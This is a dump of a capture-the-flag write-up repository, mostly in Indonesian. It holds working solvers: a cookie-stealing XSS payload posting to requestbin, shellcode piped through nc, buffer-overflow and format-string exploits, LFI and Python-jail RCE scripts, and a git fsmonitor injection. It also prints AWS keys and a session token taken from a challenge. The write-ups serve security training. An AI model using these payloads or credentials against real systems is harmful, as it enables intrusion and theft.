78 | newhonk[amountoftimeshonked]=
79 | ```
80 |
81 | Bisa dilihat di atas, karna flag memiliki domain localhost maka kita hanya bisa mendapatkan flag dari domain localhost. Kita bisa mendapatkan informas port dari Dockerfile-nya
82 | ```Dockerfile
83 | # Expose port
84 | EXPOSE 9988
85 | ```
86 |
87 | ```
88 | Final payload:
89 | http://localhost:9988/changehonk?newhonk[message]=asdasd&newhonk[amountoftimeshonked]=%3Cscript%3Edocument%2Elocation%3D%22https%3A%2F%2Frequestbin%2Eio%2F1ejfgqq1%3Fc%3D%22%20%2B%20document%2Ecookie%3B%3C%2Fscript%3E
90 | ```
91 |
92 |
93 | Tinggal kita post saja payloadnya ke /report yang ada di main page, dan kita akan mendapatkan flagnya di webhook kita (disini saya menggunakan requestbin).
--------------------------------------------------------------------------------
/2022/NCW2022/WU_NCW22_Anya Haha Inakute Sabishii.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/NCW2022/WU_NCW22_Anya Haha Inakute Sabishii.pdf
--------------------------------------------------------------------------------
/2022/SECCON CTF 2022 Quals/Pasted image 20221113195707.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/SECCON CTF 2022 Quals/Pasted image 20221113195707.png
--------------------------------------------------------------------------------
/2022/SECCON CTF 2022 Quals/Pasted image 20221113195729.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/SECCON CTF 2022 Quals/Pasted image 20221113195729.png
--------------------------------------------------------------------------------
/2022/SECCON CTF 2022 Quals/Pasted image 20221113195754.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/SECCON CTF 2022 Quals/Pasted image 20221113195754.png
--------------------------------------------------------------------------------
/2022/SECCON CTF 2022 Quals/README.md:
--------------------------------------------------------------------------------
1 | # web
2 | ---
3 | ## skipinx
4 |
5 | ### TL;DR
6 | Kita hanya perlu membuat query proxy yang banyak saat mengirimkan HTTP request, sehingga nantinya server node-js akan men-truncate jumlah yang berlebihan yaitu sampai 999.
7 |
8 | ### Step
9 | Pada challenge ini kita diberikan file berupa applikasi yang menggunakan express js.
10 | kita disuruh untuk membypass waf dari frontend server, waf-nya sebagai berikut
11 |
12 | ```nginx
13 | server {
14 | listen 8080 default_server;
15 | server_name nginx;
16 |
17 | location / {
18 | set $args "${args}&proxy=nginx";
19 | proxy_pass http://web:3000;
20 | }
21 | }
22 | ```
23 |
24 | dimana kita akan diberikan query &proxy=nginx pada setiap requests yang kita buat, sehingga akan tertangkap oleh backend dan membuat kode dibawah ini ter trigger
25 |
26 | ```js
27 | app.get("/", (req, res) => {
28 | console.log(req.query)
29 | req.query.proxy.includes("nginx") <- akan ter-trigger
30 | ? res.status(400).send("Access here directly, not via nginx :(") <- jika benar maka kita akan mendapatkan ini
31 | : res.send(`Congratz! You got a flag: ${FLAG}`);
32 | });
33 | ```
34 |
35 | agar prosess debugging web app ini jadi lebih mudah, saya perlu untuk mendeploy docker untuk memantau setiap request yang masuk, dan saya juga perlu untuk mengubah sedikit kode js-nya agar lebih mudah untuk kita mendebugging nantinya.
36 |
37 | ```js
38 | ...snip...
39 | app.get("/", (req, res) => {
40 | console.log(req.query)// berguna untuk debugging
41 | req.query.proxy.includes("nginx")
42 | ? res.status(400).send("Access here directly, not via nginx :(")
43 | : res.send(`Congratz! You got a flag: ${FLAG}`);
44 | });
45 | ...snip...
46 | ```
47 |
48 | Kemudian jalankan docker
49 |
50 | 
51 |
52 | Dari sini kita bisa testing dengan mudah, kita coba-coba saja yang menurut kita bisa untuk membypass waf tersebut.
53 |
54 | Awalnya saya mencoba untuk memasukkan char dari 1-255 kedalam query, tapi hasilnya nihil. Kemudian saya kepikiran untuk memberikan query yang banyak dan ternyata work.
55 |
56 | Bisa dilihat di log nginx pada docker yang tadi kita deploy, bahwa query terlimit sebanyak kurang lebih 1000 list.
57 |
58 | 
59 |
60 | Kita tinggal masukkan query proxy sebanyak 999 kali, dan kita mendapatkan flagnya!
61 |
62 | 
63 |
64 | ## easylfi
65 | ### solver
66 |
67 | ```python
68 | import requests
69 |
70 | URL = "http://easylfi.seccon.games:3000"
71 | # URL = "http://127.0.0.1:3000"
72 |
73 | def req(url=URL):
74 | req = requests.Request("GET", url)
75 | res = req.prepare()
76 | payload = (
77 | "/{.}./{.}./{/proc/self/cmdline,flag.txt}" + # bypass double dot
78 | "?" +
79 | # membuang SECCON dari output
80 | "&{/proc/self/cmdline,flag.txt}={" +
81 | "&{={}" +
82 | "&{}=}{" +
83 | "&{%00--_curl_--file:///app/public/../../flag.txt%0aSECCON}="
84 | )
85 | res.url = url + payload
86 | res = requests.Session().send(res)
87 | print(res.text)
88 | req()
89 | ```
--------------------------------------------------------------------------------
/2022/TCP1P-CTF-Bootcamp/PWN/Pasted image 20221231091251.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/TCP1P-CTF-Bootcamp/PWN/Pasted image 20221231091251.png
--------------------------------------------------------------------------------
/2022/TCP1P-CTF-Bootcamp/PWN/README.md:
--------------------------------------------------------------------------------
1 | # PWN
2 | ## Baby Pwn 1
3 | `writer: dimas`
4 | ### Alat
5 | - gdb + gef
6 | - pwntools
7 | - checksec
8 | - ida64
9 |
10 | ### Recon
11 | Pada soal kita diberikan source code dan juga binary. Pertama-tama kita coba untuk memeriksa security dari binary tersebut menggunakan checksec:
12 | 
13 |
14 | Bisa dilihat pada gambar diatas bahwa `Stack canary` di disable. Jadi kita bisa membuffer overflow program tanpa perlu kawatir dengan stack canary.
15 |
16 | Setelah itu kita akan mencoba untuk mendisassamble binary teserbut menggunakan ida64. Di ida64 kita menemukan beberapa fungsi penting yaitu:
17 |
18 | - Yang pertama ada fungsi flag yang berfungsi untuk membaca flag.
19 |
20 | ```cpp
21 | __int64 flag(void)
22 | {
23 | __int64 v0; // rax
24 | char v2[536]; // [rsp+0h] [rbp-220h] BYREF
25 |
26 | std::basic_ifstream>::basic_ifstream(v2, "flag.txt", 8LL);
27 | if ( (unsigned __int8)std::basic_ifstream>::is_open(v2) )
28 | {
29 | v0 = std::basic_ifstream>::rdbuf(v2);
30 | std::ostream::operator<<(&std::cout, v0);
31 | }
32 | std::basic_ifstream>::close(v2);
33 | putchar(10);
34 | return std::basic_ifstream>::~basic_ifstream(v2);
35 | }
36 | ```
37 |
38 | - Yang kedua ada fungsi vuln dimana vulnerability buffer overflow berada.
39 | ```cpp
40 | int vuln(void)
41 | {
42 | int result; // eax
43 | char v1[104]; // [rsp+0h] [rbp-70h]
44 | int v2; // [rsp+68h] [rbp-8h]
45 | int v3; // [rsp+6Ch] [rbp-4h]
46 |
47 | Setup();
48 | v3 = 0;
49 | logo();
50 | puts("Hello! welcome to TCP1P!");
51 | puts("What is your name?");
52 | do
53 | {
54 | result = getchar();
55 | v2 = result;
56 | if ( result == 10 )
57 | break;
58 | result = v3;
59 | v1[v3++] = v2;
60 | }
61 | while ( v3 != 121 );
62 | return result;
63 | }
64 | ```
65 |
66 | Jadi buffer overflow berada di dalam loop `do while` dimana `do while` menerima input lebih banyak dari variable `char v1[104]` sehingga mengakibatkan buffer overflow.
67 |
68 | Buffer overflow ini bisa mempengaruhi variable v2 dan v3 yang berada di bawahnya. Karna variable `v3` ini berfungsi untuk mengatur index pada variable `v1` kita dapat merubah variable `v3` sehingga nanti kita bisa membypass restriksi ini `while ( v3 != 121 );` dimana jika kita merubah variable `v3` menjadi lebih besar dari `121` maka kondisi tidak akan pernah terpenuhi dalam loop, sehingga kita bisa mendapatkan infinity loop dan dari situ kita bisa membuat buffer overflow ke return address untuk mengontrol return address tersebut.
69 |
70 | ### Eksploitasi
71 | Pertama yang harus kita lakukan adalah menentukkan padding agar kita dapat meng-buffer overflow variable `v3`. Kita akan cek lagi pseudocde pada vungsi `vuln` di bagian deklarasi variable.
72 |
73 | ```cpp
74 | int result; // eax
75 | char v1[104]; // [rsp+0h] [rbp-70h]
76 | int v2; // [rsp+68h] [rbp-8h]
77 | int v3; // [rsp+6Ch] [rbp-4h]
78 | ```
79 |
80 | Jadi untuk menemukan padding yang pas kita perlu menghitung dari variable `char v1[104]`. Variable ini memiliki buffer sebanyak 104 byte dan setelah itu ada variable `v2` sebanyak 4 byte (kita bisa tau karna [type int](https://www.geeksforgeeks.org/data-types-in-c/) menggunakan 4 byte). Jadi dari situ kita bisa mendapatkan padding sebanyak 108 byte untuk mencapai variable `v3`:
81 |
82 | ```
83 | v1[104] + v2[4] = 108
84 | ```
85 |
86 | Karna pada security di binary ada `pie enable` address dari setiap fungsi akan di randomize, Kita hanya bisa merubah address terakhir dari return address untuk ke ke fungsi yang valid.
87 |
88 | 
89 |
90 | Karna yang paling dekat dengan fungsi vuln adalah fungsi main, dimana fungsi main ini ada call flag didalamnya, maka kita dapat merubah byte terakhir di return adress dengan byte dari fungsi main yang ada call flag tersebut.
91 | ```cpp
92 | int main()
93 | {
94 | bool showflag = false;
95 | vuln();
96 | if (showflag){
97 | flag(); <- kita ingin locat ke address ini
98 | }
99 | }
100 | ```
101 |
102 | berikut solver yang saya gunakan untuk solve challenge tersebut.
103 | ```python
104 | from pwn import *
105 | import sys
106 |
107 | BINARY = "chall"
108 | context.binary = exe = ELF(BINARY, checksec=False)
109 | context.terminal = "konsole -e".split()
110 | context.log_level = "INFO"
111 | context.bits = 64
112 | context.arch = "amd64"
113 |
114 |
115 | def init():
116 | if args.RMT:
117 | p = remote(sys.argv[1], sys.argv[2])
118 | else:
119 | p = process()
120 | return Exploit(p), p
121 |
122 |
123 | class Exploit:
124 | def __init__(self, p: process):
125 | self.p = p
126 |
127 | def debug(self, script=None):
128 | if not args.RMT:
129 | if script:
130 | attach(self.p, script)
131 | else:
132 | attach(self.p)
133 |
134 | x, p = init()
135 |
136 | x.debug((
137 | "break *vuln+87\nc\n" # while ( v3 != 121 )
138 | "c\n"*56 # continue sampai v3 ter overwrite
139 | # "break *vuln+98\nc\n" # break point return
140 | ))
141 |
142 | padding = b"A"*108
143 | payload = padding
144 | payload += p8(142) # index byte terakhir dari return address
145 | payload += p8((exe.sym['main']+23) & 0xff) # byte terakhir dari fungsi main+23 = call flag
146 |
147 | p.sendline(payload)
148 |
149 | p.interactive()
150 | ```
--------------------------------------------------------------------------------
/2022/annofest-2022/Penyisihan/README.md:
--------------------------------------------------------------------------------
1 | ## shell (4 solved)
2 |
3 | ```asm
4 | section .text
5 | global _start
6 | _start:
7 | xor rax, rax
8 | push rax
9 | mov rdx, rsp
10 | mov rbx, 0x0068732f6e69622f2f
11 | push rbx
12 | mov rdi, rsp
13 | push rax
14 | push rdi
15 | mov rsi,rsp
16 | add rax, 59
17 | syscall
18 | ```
19 |
20 | inputkan untuk mengekstrak hex instruksi assembly-nya:
21 | ```sh
22 | nasm -gstabs -f elf64 -o bin_sh.o bin_sh.asm && ld bin_sh.o -o bin_sh && ./bin_sh
23 | objdump -M Intel -d ./bin_sh |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
24 | ```
25 |
26 | Lalu masukkan kedalam payload
27 | ```sh
28 | (python2 -c 'print "\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\
29 | x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"';cat) | nc 101.50.0.66 9002
30 | ```
31 |
32 | ## Follina (9 solved)
33 |
34 | Untuk folina saya melihat referensi kode dari github john hammond https://github.com/JohnHammond/msdt-follina
35 |
36 | ```python
37 | ...snip...
38 | # Modify the Word skeleton to include our HTTP server
39 | document_rels_path = os.path.join(
40 | staging_dir, doc_suffix, "word", "_rels", "document.xml.rels"
41 | )
42 | ...snip...
43 | ```
44 |
45 | disini kita dapat menyimpulkan bahwa filenya ada di `/word/_rels/document.xml.rels`
46 |
47 | kita disasamble doc-nya menggunakan binwalk
48 | ```sh
49 | binwalk follina.doc -e
50 | ```
51 |
52 | kita masuk ke path filenya dan mendapatkan
53 | ```
54 | ...snip...Target="https://github.com/banuaa/folliware!"...snip...
55 | ```
56 |
57 | Kita akan diarahkan ke githubnya mas banua. Kita download file yang ada di sana, lalu bruteforce zipnya menggunakan john
58 |
59 | ```sh
60 | zip2john flag.zip > brute.hash
61 | john --wordlist=/usr/share/wordlists/rockyou.txt brute.hash
62 | ```
63 |
64 | ## ROXYNAM (6 solved)
65 | ```python
66 | FLG_ENC = "flag.jpg.enc"
67 | EX_JPG = "example.jpg"
68 |
69 | with open(FLG_ENC, "rb") as f:
70 | FLG_BIN = f.read()[:3]
71 |
72 | with open(EX_JPG, "rb") as f:
73 | EX_BIN = f.read()[:3]
74 |
75 | # search the key
76 | key = ""
77 | for i, j in zip(FLG_BIN, EX_BIN):
78 | for k in range(0xff):
79 | if i ^ k == j:
80 | key += ('{:02x}'.format(k))
81 | break
82 | key = bytes.fromhex(key).decode()
83 |
84 | with open(FLG_ENC, "rb") as f:
85 | FLG_BIN = f.read()
86 |
87 | # xor all the binary in the flag.jpg.enc
88 | jpg_flag = bytes([x ^ ord(key[i % len(key)]) for i, x in enumerate(FLG_BIN)])
89 | with open("flag.jpg", "wb") as f:
90 | f.write(jpg_flag)
91 | ```
92 |
93 | disini saya hanya membandingkan header flag jpg dengan jpg lain. Kemudian men-xornya dengan key yang ditemukan.
--------------------------------------------------------------------------------
/2022/corCTF 2022/babypwn/babypwn:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/corCTF 2022/babypwn/babypwn
--------------------------------------------------------------------------------
/2022/corCTF 2022/babypwn/get_libc.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwn import *
4 | from struct import pack
5 |
6 | exe = ELF("./main/babypwn",
7 | checksec=False
8 | )
9 | libc = ELF("./main/libc.so.6",
10 | checksec=False
11 | )
12 |
13 | context.binary = exe
14 | context.log_level = "CRITICAL"
15 | context.terminal = ["konsole", "-e"]
16 |
17 | REMOTE = ("localhost", 5000)
18 |
19 | args.local = False
20 | args.debug = False
21 | if args.local == False:
22 | args.debug = False
23 |
24 |
25 | class Exploit:
26 | def __init__(self):
27 | if args.local:
28 | self.process = "process()"
29 | else:
30 | self.process = "remote(REMOTE[0], REMOTE[1])"
31 | self.debug = args.debug
32 |
33 | def get_libc_base(self, proc: process):
34 | proc.sendafter(b"What is your name?\n", b"%2$p|\n")
35 | # proc.interactive()
36 | libc_base = proc.recvuntil(b"|")[6:-2]+b"0"
37 | libc_base = int(libc_base, 16)-0x23a70
38 | return libc_base
39 |
40 | def conn(self, proc: process, libc_base):
41 | proc.sendafter(b"What's your favorite :msfrog: emote?\n",
42 | b"\x00"*96 +
43 | pack(" list:
11 | '''find all x and y coordinates in the data'''
12 | x = re.findall(r'x=(\d+)', dat)
13 | y = re.findall(r'y=(\d+)', dat)
14 | return x, y
15 |
16 | def get_comands(dat) -> list:
17 | '''find all command in the data'''
18 | com = re.findall(r'(?<=event=).*(?= HT)', dat)
19 | return com
20 |
21 | x, y = getxy(data)
22 | comand = get_comands(data)
23 | turtle.setup(WIDTH*100, HEIGHT*100)
24 | turtle.goto(0, 0)
25 |
26 | turtle.speed(10)
27 |
28 | def pixel_method(pix, size):
29 | turtle.shape('circle')
30 | turtle.shapesize(size, size)
31 | mouse = "mouseup"
32 | for i in range(len(x)):
33 | if mouse == "mouseup":
34 | turtle.penup()
35 | elif mouse == "mousedown":
36 | x_pix = (int(x[i])//pix)
37 | y_pix = (int(y[i])//pix)
38 | turtle.goto((x_pix*pix)-300, (y_pix*pix))
39 | turtle.stamp()
40 | if comand[i] == 'mousedown':
41 | mouse = "mousedown"
42 | elif comand[i] == 'mouseup':
43 | mouse = "mouseup"
44 | while True:
45 | pass
46 |
47 | def pen_method():
48 | mouse = "mouseup"
49 | for i in range(len(x)):
50 | if mouse == "mouseup":
51 | turtle.penup()
52 | elif mouse == "mousedown":
53 | turtle.pendown()
54 | if comand[i] == 'mousedown':
55 | mouse = "mousedown"
56 | elif comand[i] == 'mouseup':
57 | mouse = "mouseup"
58 | turtle.goto(int(x[i])-300, int(y[i]))
59 | while True:
60 | pass
61 |
62 | pixel_method(7, size=0.1)
63 | # pen_method()
--------------------------------------------------------------------------------
/2022/corCTF 2022/whack-a-frog/whacking-the-froggers.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/corCTF 2022/whack-a-frog/whacking-the-froggers.pcap
--------------------------------------------------------------------------------
/2022/csawctf-qual-2022/Pasted image 20220912170611.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170611.png
--------------------------------------------------------------------------------
/2022/csawctf-qual-2022/Pasted image 20220912170634.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170634.png
--------------------------------------------------------------------------------
/2022/csawctf-qual-2022/Pasted image 20220912170647.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170647.png
--------------------------------------------------------------------------------
/2022/csawctf-qual-2022/Pasted image 20220912170726.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170726.png
--------------------------------------------------------------------------------
/2022/csawctf-qual-2022/Pasted image 20220912170742.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170742.png
--------------------------------------------------------------------------------
/2022/csawctf-qual-2022/Pasted image 20220912171239.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912171239.png
--------------------------------------------------------------------------------
/2022/csawctf-qual-2022/Pasted image 20220912171311.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912171311.png
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/README.md:
--------------------------------------------------------------------------------
1 | Bypass Python jail: [rce.py](rce.py)
2 | Use aws credentials: [access.py](access.py)
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/access.py:
--------------------------------------------------------------------------------
1 | import os
2 | aws_creds = """
3 | [default]
4 | AWS_DEFAULT_REGION=eu-central-1
5 | AWS_SECRET_ACCESS_KEY=Kr/VrI3xYyFJV0hHdCqvvL8XS/0+10eyiihLVmHc
6 | AWS_REGION=eu-central-1
7 | AWS_ACCESS_KEY_ID=ASIA22D7J5LEAJ27IDGC
8 | """
9 | with open('/home/wowon/.aws/credentials', 'w') as f:
10 | f.write(aws_creds)
11 | os.system('aws s3 cp s3://nullcon-s3bucket-flag4/flag4.txt .')
12 |
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/flag4.txt:
--------------------------------------------------------------------------------
1 | ENO{L4mbda_make5_yu0_THINK_OF_ENVeryone}
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/rce.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import readline
3 | from base64 import b64encode
4 | import json
5 |
6 | url = "http://3.64.214.139"
7 |
8 |
9 | def comand(cmd):
10 | cmd = b64encode(cmd.encode()).decode()
11 | payload = "__import__('os').popen('echo {} | base64 -d | bash').read()".format(cmd)
12 | r = requests.post(url+"/calc",
13 | json={"input": payload,},
14 | # proxies={'http': 'http://localhost:8080',}
15 | )
16 | js = r.text
17 | js = json.loads(js)
18 | return js["result"]
19 |
20 |
21 | while True:
22 | cmd = input("rce> ")
23 | print(comand(cmd))
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/set.env.sh:
--------------------------------------------------------------------------------
1 | export AWS_ACCESS_KEY_ID="ASIA22D7J5LEAJ27IDGC"
2 | export AWS_SECRET_ACCESS_KEY="Kr/VrI3xYyFJV0hHdCqvvL8XS/0+10eyiihLVmHc"
3 | export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjECwaDGV1LWNlbnRyYWwtMSJHMEUCIFcvm4jEqly0drMTbqTiCitkoGH9b0HA3QeNnvhMXlAxAiEA7PY0AeQmQRYs0GPTn8htIaeNRK1sG5sH0wkj603EL3sqggMIlf//////////ARAAGgw3NDMyOTYzMzA0NDAiDGjYTjtMMg9LXpsZfCrWAoqCIBm4zDK2GeBKddq8U0EcE+9Vo6W2Go1c8zvXUhXkEVFpYs5+B4jPkgZeh56RE5IFlaSszt4JV8rcjobHWHjKa+kqTxUTTYEvXXnIWsDNBNj/Mw8hmhoAxGw4OA2fF5VVn10QyQoTb9TlWgZ9gV1fdEEOCL31JxCqsDV7XzSlJpNr3ZCVcDP7TD/vChiYaDTDZ8wBsD+HMxTjaQzKpz45FptugStkMTevdHu5mAGba65xIOuBSsCzA2se+wqtX5nwOfqi+eTRAoUS0AoLI5+hva+d6taT8Reml35m2bmuqYTgyGm3hI733NkmuSydaNmKDlmy3/Xaa3X6VfuBlsC8CRg2VgM3Yjw6MI6vCmc58ujrkBYdDoTk/817r2IeSFrtEEqE+e9yBr3gAFriIfCvntEd7g5/Vn1ZgS1GLFYjOdnTtzgxz99cK6w7TdaEltVUXxUcbTDD99+XBjqeAbuFMFWyBlRGpbPt7LWj4nNh4ALlqQLieqat/FA1PKACtCTh/C/9ncZVh88hqgu1VJN7WUaqaL7VZkBVuu3IQ3DTv9e+XMFMMjmIFC6bfh3Hij+CVmM+QbFc20csMkzg+d1N5rLHKRPoXjlZT/ghWklVUw0DEw30rv2Z90toCZLrLXnZfSxq65f7aEvHi3Rq1GIiSgLM+yp0J7lykAgi"
4 | export AWS_DEFAULT_REGION="eu-central-1"
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Git To the Core/README.md:
--------------------------------------------------------------------------------
1 | RCE: [connect.py](connect.py)
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Git To the Core/connect.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 | import os
3 | import re
4 |
5 | # reference: https://lwn.net/Articles/892755/
6 |
7 | RMT = "52.59.124.14", 10001
8 | MYGIT = "http://0.tcp.ap.ngrok.io:17745/.git/"
9 |
10 | CONFIG = """
11 | [core]
12 | repositoryformatversion = 0
13 | filemode = true
14 | bare = false
15 | logallrefupdates = true
16 | fsmonitor = "echo \\"Pwned as $(%s)\\">&2; false"
17 | """
18 |
19 | context.log_level = "WARNING"
20 |
21 | class Exploit:
22 | def __init__(self, cmd, rmt=RMT, git=MYGIT, configTemplate=CONFIG):
23 | self.rmt = rmt
24 | self.git = git
25 | self.cmd = cmd
26 | self.configTemplate = configTemplate
27 | if not os.path.exists(".git/"):
28 | os.system("git init")
29 |
30 | def conn(self, cmd):
31 | r = remote(*RMT)
32 | r.sendlineafter(b"Please provide an URL: ", bytes(cmd, "utf-8"))
33 | return r
34 |
35 | def rceConfig(self, cmd):
36 | with open(".git/config", "w") as f:
37 | f.write(self.configTemplate % cmd)
38 | return None
39 |
40 | def start(self):
41 | self.rceConfig(self.cmd)
42 | self.conn(self.git).interactive()
43 |
44 | Exploit("cat /FLAG").start()
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Git To the Core/task.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 | import subprocess
4 | import shutil
5 |
6 | print("Challenge was created with <3 by @gehaxelt.")
7 | git_url = input("Let's dump a .git/ repository from a web server of your choice. Please provide an URL: ")
8 |
9 | uid = 1500 #cloner
10 | gid = 65534 #nobody
11 |
12 | temp_dir = tempfile.mkdtemp()
13 | os.chown(temp_dir, uid, -1)
14 |
15 | # https://stackoverflow.com/questions/2699907/dropping-root-permissions-in-python/2699996#2699996
16 | os.setgroups([])
17 | os.setgid(gid) #nobody
18 | os.setuid(uid) #cloner
19 |
20 | os.chdir(temp_dir)
21 | print("Running command: ", ' '.join(["/opt/GitTools/Dumper/gitdumper.sh", git_url, "./repo"]))
22 | clone_output = subprocess.run(["/opt/GitTools/Dumper/gitdumper.sh", git_url, "./repo"], capture_output=True, timeout=10, text=True)
23 |
24 | print(clone_output.stdout)
25 | print(clone_output.stderr)
26 |
27 | if os.path.exists("./repo") and os.path.isdir("./repo"):
28 | os.chdir("./repo")
29 | print("Running git checkout: ", ' '.join(["git", "checkout", "."]))
30 | checkout_output = subprocess.run(["git", "checkout", "."], capture_output=True, timeout=10, text=True)
31 | print(checkout_output.stdout)
32 | print(checkout_output.stderr)
33 | else:
34 | print("Failed to clone the repository!")
35 |
36 | os.chdir(temp_dir)
37 | shutil.rmtree(temp_dir)
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Unis Love Code/chall.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import urllib.parse
3 | import http.server
4 | import socketserver
5 | import re
6 | import os
7 | import cgi
8 | import string
9 | from io import StringIO
10 | # from flag import FLAG
11 | FLAG = "test{flag}"
12 |
13 |
14 | class UnisLoveCode(http.server.SimpleHTTPRequestHandler):
15 | server_version = "UnisLoveCode"
16 | username = 'ADMIN'
17 | check_funcs = ["strip", "lower"]
18 |
19 | def do_GET(self):
20 | self.send_response(-1337)
21 | self.send_header('Content-Length', -1337)
22 | self.send_header('Content-Type', 'text/plain')
23 | s = StringIO()
24 | s.write("""Wait,whatisHTML?!Ishouldhavelistenedmorecarefullytotheprofessor...\nAnyhow,passwordlessisthenewhottopic,sojustprovidemethecorrectusername=viaPOSTandImightshowyoumyhomework.\nOh,incaseyouneedthesource,hereyougo:\n""")
25 | s.write("---------------------------------\n")
26 | s.write(re.sub(r"\s+", '', open(os.path.realpath(__file__), "r").read()))
27 | s.write("\n")
28 | s.write("---------------------------------\n")
29 | s.write("\nChallengecreatedwith<3by@gehaxelt\n")
30 | self.end_headers()
31 | self.wfile.write(s.getvalue().encode())
32 |
33 | def _check_access(self, u):
34 | for cf in UnisLoveCode.check_funcs:
35 | print("getattr:"+getattr(str, cf)(UnisLoveCode.username))
36 | print("u:"+u)
37 | if getattr(str, cf)(UnisLoveCode.username) == u:
38 | return False
39 | print("bypasses-1")
40 | for c in u:
41 | if c in string.ascii_uppercase:
42 | return False
43 | print("bypasses-2")
44 | print("u.upper:"+u.upper())
45 | return UnisLoveCode.username.upper() == u.upper()
46 |
47 | def do_POST(self):
48 | self.send_response(-1337)
49 | self.send_header('Content-Length', -1337)
50 | self.send_header('Content-Type', 'text/plain')
51 | s = StringIO()
52 | try:
53 | length = min(int(self.headers['content-length']), 64)
54 | field_data = self.rfile.read(length)
55 | fields = urllib.parse.parse_qs(field_data.decode("utf8"))
56 | if not 'username' in fields:
57 | s.write("Iaskedyouforausername!\n")
58 | raise Exception("Wrongparam.")
59 | username = fields['username'][0]
60 | if not self._check_access(username):
61 | s.write("No.\n")
62 | raise Exception("No.")
63 | s.write(f"OK,hereisyourflag:{FLAG}\n")
64 | except Exception as e:
65 | s.write("Tryharder;-)!\n")
66 | print(e)
67 | self.end_headers()
68 | self.wfile.write(s.getvalue().encode())
69 |
70 |
71 | if __name__ == "__main__":
72 | PORT = 8000
73 | HANDLER = UnisLoveCode
74 | with socketserver.ThreadingTCPServer(("0.0.0.0", PORT), HANDLER) as httpd:
75 | print(f"http://localhost:{PORT}")
76 | httpd.serve_forever()
77 |
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Unis Love Code/test.py:
--------------------------------------------------------------------------------
1 | a="I"
2 | # unicode character that produce the same result as the string "ADMIN"
3 | # but is not a valid ASCII character
4 | # and if you try to compare it with the string "ADMIN"
5 | # it will return True
6 | b = "\u0131"
7 | # b = b.upper()
8 | # print(bytes(b, "utf8"))
9 | print(b)
10 | print(a==b)
11 |
12 | # payload username=admın
13 | # http://www.unicode.org/Public/UNIDATA/CaseFolding.txt
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/jsonify/flag.txt:
--------------------------------------------------------------------------------
1 | test{flag}
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/jsonify/index.php:
--------------------------------------------------------------------------------
1 | flagfile = $flagfile;
22 | }
23 | }
24 | public function __shutdown()
25 | {
26 | return $this->properties;
27 | }
28 | public function __startup()
29 | {
30 | $this->readFlag();
31 | }
32 | public function __toString()
33 | {
34 | return "ClassFlag(" . $this->flag . ")";
35 | }
36 | public function setFlag($flag)
37 | {
38 | $this->flag = $flag;
39 | }
